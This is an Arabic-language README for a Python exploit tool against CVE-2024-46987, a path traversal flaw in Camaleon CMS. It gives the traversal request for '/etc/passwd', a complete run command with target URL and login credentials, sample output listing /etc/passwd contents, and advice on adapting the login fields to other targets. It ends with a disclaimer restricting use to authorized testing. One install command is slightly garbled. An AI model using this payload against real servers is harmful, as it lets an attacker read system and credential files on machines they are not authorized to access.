
استغلال تم إنشاؤه باستخدام بايثون
CVE-2024-46987 هي ثغرة تجاوز مسار موثَّقة (CWE-22) في Camaleon CMS (نظام إدارة محتوى مبني على Ruby on Rails). تسمح لمستخدم مسجل (حتى مع صلاحيات منخفضة) بقراءة ملفات تعسفية على الخادم عبر إجراء MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:Nيمكن للمهاجم الذي يمتلك بيانات اعتماد صالحة إرسال طلب مخصص إلى: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtأو
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
ملاحظة: يفترض السكريبت نموذج تسجيل دخول بنمط Rails (user[email], user[password], authenticity_token). قم بتعديل حقول الحمولة إذا كان هدفك يستخدم أسماء مخصصة.
تم توفير هذه الأداة لأغراض تعليمية واختبار أمني مرخص فقط.
استخدمها فقط على أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها (مثل برامج مكافآت الثغرات، اختبارات الاختراق الداخلية، مختبرات مثل HTB). الاستخدام غير المصرح به قد يخالف القوانين. المؤلف غير مسؤول عن سوء الاستخدام.